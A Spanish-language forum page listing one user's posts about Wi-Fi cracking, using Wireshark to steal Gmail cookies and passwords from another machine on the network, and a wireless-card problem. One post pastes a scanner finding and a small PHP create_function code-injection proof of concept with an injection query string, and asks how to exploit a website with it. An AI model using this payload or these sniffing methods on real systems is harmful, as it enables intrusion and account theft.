elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6
21  Seguridad Informática / Wireless en Windows / Re: Mitm con wireshark en: 21 Mayo 2010, 14:18 pm
Pero se puede hacer con wireshark?
22  Seguridad Informática / Wireless en Windows / Mitm con wireshark en: 21 Mayo 2010, 11:59 am
Hola, pues no sé mucho aún del tema, pero he conseguido conseguir la contraseña de mi propia red wifi con backtrack3 (tras mucho leer xd).  Ahora lo que quiero es con mi ordenador de sobremesa coger los datos de mi portátil. He estado leyendo sobre el tema y he oído nombrar sinffers como cain y abil, ettercap o wireshark. El que mejor me funciona en windows es wireshark. El problema es que solo me captura paquetes de mi propio ordenador, alguien sabe como capturar paquetes de mi otro ordenador que esta también conectado a la misma red wifi?.
 
Por ejemplo lo que quiero hacer es conectarme a gmail con mi portatil y con el otro ordenador sacar mi contraseña.  Gracias

Edit: consigo robar las cookies de gmail pero si sniffo con el propio ordenador con el que me conecto, pero yo quiero robar cookies al otro odenador, gracias.
23  Seguridad Informática / Wireless en Linux / Re: No encuentro datas, puede ser por que la tarjeta no valga? en: 27 Abril 2010, 23:01 pm
Perdona, no había leído los enlaces.  Gracias!
24  Seguridad Informática / Wireless en Linux / Re: No encuentro datas, puede ser por que la tarjeta no valga? en: 27 Abril 2010, 23:01 pm
Cuál puede ser el problema? los drives o algo o que
25  Seguridad Informática / Wireless en Linux / Re: No encuentro datas, puede ser por que la tarjeta no valga? en: 27 Abril 2010, 22:36 pm
Bueno lo que me pasa es que en todas las redes tengo el PWR a -1 (incluso en mi router a 1 metro) y por mucho tiempo que lo deje no consigo datas pero sí beacons. Puede ser que la tarjeta ( creo que es la Chipset Mobile Intel® 945GM/PM Express  o
Intel® PRO/Wireless 3945ABG) no funcione para eso. Y si ese es el caso, me gustaría saber si se puede solucionar una una antena wifi usb. Gracias
26  Seguridad Informática / Wireless en Linux / No encuentro datas, puede ser por que la tarjeta no valga? en: 27 Abril 2010, 21:36 pm
Hola tengo un acer aspire 5602, escaneo las redes wifis a mi alcance y en PWR todas me da -1.
Me pongo al lado de mi router y tmb pwr -1 y no consigo datas.
puede ser por que la tarjeta no valga? Y se podía solucionar con una antena usb? Muchas gracias.
Saludos. Ricardo.
27  Seguridad Informática / Nivel Web / Re: ¿Cómo explotar esta vulnerabilidad? en: 16 Octubre 2008, 15:18 pm
jeje hola huemulito no sabia que estabas en este foro
si me ha servido pero no me ha quedado muy claro como llamo al explot
con rfi o como
28  Seguridad Informática / Nivel Web / ¿Cómo explotar esta vulnerabilidad? en: 15 Octubre 2008, 15:23 pm
Bueno he analizado una web y he encontrado este bug:

 
Código:
Web Servers : PHP create_function Code Injection Weakness
Port 80 
Description PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.This weakness is reported in PHP 5.2.6; other versions may also be affected. 
How to fix Upgrade to the current version of PHP. 
Risk level High 
Related Links PHP HomePage.
 
CVE CVE-MAP-NOMATCH 
Bugtraq ID 31398 


he buscado y tengo este explot en php
Código:
<?php
# call as test.php?sort_by="]);}phpinfo();/*
$sort_by=stripslashes($_GET[sort_by]);
$databases=array("test");
$sorter = 'var_dump';
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';


usort($databases, create_function('$a, $b', $sort_function));

?>

Alguien sabe como lo puedo utilizar?
Gracias
29  Programación / Programación Visual Basic / Re: [Ayuda] Codigo de Inicio en: 10 Enero 2008, 16:58 pm
ya te lo respondí en area
30  Programación / Programación Visual Basic / Re: Calendario en: 11 Enero 2007, 20:36 pm
Pues mira yo uso uno que me va muy bien:
Vas a proyecto/componentes y elijes Microsfot Calendar control 8.0

y en la barra de herramientas se te añade un nuevo dibujito que es
el calendario
lo selecionas y lo expandes como si fuera un command button

espero k te sirva y me alegro d k aya mujeres en vb jeej
Páginas: 1 2 [3] 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines